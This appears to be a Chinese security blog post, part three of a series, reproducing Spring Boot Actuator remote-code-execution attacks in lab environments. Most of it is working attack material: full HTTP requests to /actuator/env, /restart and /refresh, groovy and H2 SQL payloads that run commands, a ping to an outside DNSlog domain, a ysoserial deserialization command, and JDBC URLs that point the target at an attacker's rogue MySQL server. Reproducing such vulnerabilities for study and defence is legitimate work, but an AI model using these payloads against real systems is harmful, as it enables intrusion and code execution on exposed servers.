点击关注公众号,知识干货及时送达👇
请结合文章Spring Boot系列漏洞(一)、Spring Boot系列漏洞(二)食用
1
Restart logging.config groovy RCE
漏洞环境:springboot-restart-rce
利用条件
·⚠️可以 POST 请求目标网站的 /env 接口设置属性
·⚠️可以 POST 请求目标网站的 /restart 接口重启应用
·⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出
·⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件,会导致程序异常退出
·⚠️ 环境中需要存在 groovy 依赖,否则会导致程序异常退出
漏洞复现
第一步
制作example.groovy文件,放在VPS开启的服务根目录
python -m http.server 80Runtime.getRuntime().exec("calc")
第二步
设置logging.config属性
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"name":"logging.config","value":"http://127.0.0.1/example.groovy"}
重启应用
POST /actuator/restart HTTP/1.1
Host: 127.0.0.1:9098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNSlog检测
修改example文件中的代码即可
2
Restart spring.main.sources groovy RCE
漏洞环境:springboot-restart-rce
利用条件
·⚠️可以 POST 请求目标网站的 /env 接口设置属性
·⚠️可以 POST 请求目标网站的 /restart 接口重启应用
·⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出
·⚠️ HTTP 服务器如果返回含有畸形 groovy 语法内容的文件,会导致程序异常退出
·⚠️ 环境中需要存在 groovy 依赖,否则会导致程序异常退出
漏洞复现
第一步
制作example.groovy文件,放在VPS开启的服务根目录
python -m http.server 80Runtime.getRuntime().exec("calc")
第二步
设置spring.main.sources属性
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"name":"spring.main.sources","value":"http://127.0.0.1/example.groovy"}
重启应用
POST /actuator/restart HTTP/1.1
Host: 127.0.0.1:9098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
这里和restart logging,config groovy RCE利用相同,只不过修改的属性是spring.main.sources,restart logging,config groovy RCE修改的属性是logging.config
DNSlog检测
修改example文件中的代码即可
3
Restart spring.datasource.data h2 database RCE
漏洞环境:springboot-restart-rce
利用条件
·⚠️可以 POST 请求目标网站的 /env 接口设置属性
·⚠️可以 POST 请求目标网站的 /restart 接口重启应用
·⚠️环境中需要存在 h2database、spring-boot-starter-data-jpa 相关依赖
·⚠️ 目标可以请求攻击者的 HTTP 服务器(请求可出外网),否则 restart 会导致程序异常退出
·⚠️ HTTP 服务器如果返回含有畸形 h2 sql 语法内容的文件,会导致程序异常退出
漏洞复现
第一步
制作example.groovy文件,放在VPS开启的服务根目录
python -m http.server 80CREATE ALIAS T4 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T4('cmd','/C','start calc');
注意:这里的payload每次执行之后都需要修改文件名以及方法名称并且修改对应的URL地址(文件名),才可以被resart重新使用
第二步
设置spring.datasource.data的属性
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"name":"spring.datasource.data","value":"http://127.0.0.1/example4.sql"}
重启应用
POST /actuator/restart HTTP/1.1
Host: 127.0.0.1:9098
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
DNSlog检测
修改example5.sql文件,并修改第一步的URL地址
CREATE ALIAS T5 AS CONCAT('void ex(String m1,String m2,String m3)throws Exception{Runti','me.getRun','time().exe','c(new String[]{m1,m2,m3});}');CALL T5('cmd','/C','ping dxxqzqbizh.dnstunnel.run');
4
Mysql jdbc deserialization RCE
漏洞环境:springboot-mysql-jdbc-rce
利用条件
·⚠️ 可以 POST 请求目标网站的 /env 接口设置属性
· ⚠️可以 POST 请求目标网站的 /refresh 接口刷新配置(存在 spring-boot-starter-actuator 依赖)
· ⚠️目标环境中存在 mysql-connector-java 依赖
·⚠️ 目标可以请求攻击者的服务器(请求可出外网)
本地环境需要配置application.properties中的数据库
spring.datasource.url=jdbc:mysql://127.0.0.1:3306/demo?characterEncoding=utf8&useSSL=false&serverTimezone=GMT
spring.datasource.username=root
spring.datasource.password=root
spring.datasource.driver-class-name=com.mysql.jdbc.Driver
服务启动后开放的是9097端口
漏洞复现
第一步
GET请求/actuator/env,搜索环境变量中是否有mysql-connector-java关键词
版本号:mysql-connector-java-8.0.12.jar
存在反序列化gadget依赖:commons-collections 3.2.1
JDBC连接信息
jdbc:mysql://127.0.0.1:3306/demo?characterEncoding=utf8&useSSL=false&serverTimezone=GMT
第二步
架设恶意的rogue mysql server
下载脚本:https://raw.githubusercontent.com/LandGrey/SpringBootVulExploit/master/codebase/springboot-jdbc-deserialization-rce.py使用ysoserial定义执行的命令
https://github.com/frohoff/ysoserial/releases/tag/v0.0.6java -jar ysoserial-all.jar CommonsCollections3 calc > payload.ser
使用python2 执行python脚本,并将payload.ser放在执行脚本的同级目录下
第三步
设置spring.datasource.url属性
mysql-connector-java 5.x 版本设置属性值为:
jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=truemysql-connector-java 8.x 版本设置属性值为:
jdbc:mysql://your-vps-ip:3306/mysql?characterEncoding=utf8&useSSL=false&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true设置属性发送包
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9097
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"name":"spring.datasource.url","value":"jdbc:mysql://192.168.8.157:3306/mysql?characterEncoding=utf8&useSSL=false&serverTimezone=GMT&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&autoDeserialize=true"}
重启应用
POST /actuator/refresh HTTP/1.1
Host: 127.0.0.1:9097
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
步骤四
访问数据库查询接口,触发漏洞。或者寻找网站上其他进行数据查询的功能,此处只是测试demo
GET /product/list HTTP/1.1
Host: 127.0.0.1:9097
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
python脚本搭建的mysql服务有反应,但是我这里没执行成功
恢复正常jdbc url
把上面获取的jdbc连接,重新在步骤三发送一次
POST /actuator/env HTTP/1.1
Host: 127.0.0.1:9097
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: identity
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Length: 0
Content-Type: application/json
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
{"name":"spring.datasource.url","value":"jdbc:mysql://127.0.0.1:3306/demo?characterEncoding=utf8&useSSL=false&serverTimezone=GMT"}
哦原文始发于微信公众号(希石安全团队):Spring Boot系列漏洞(三)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论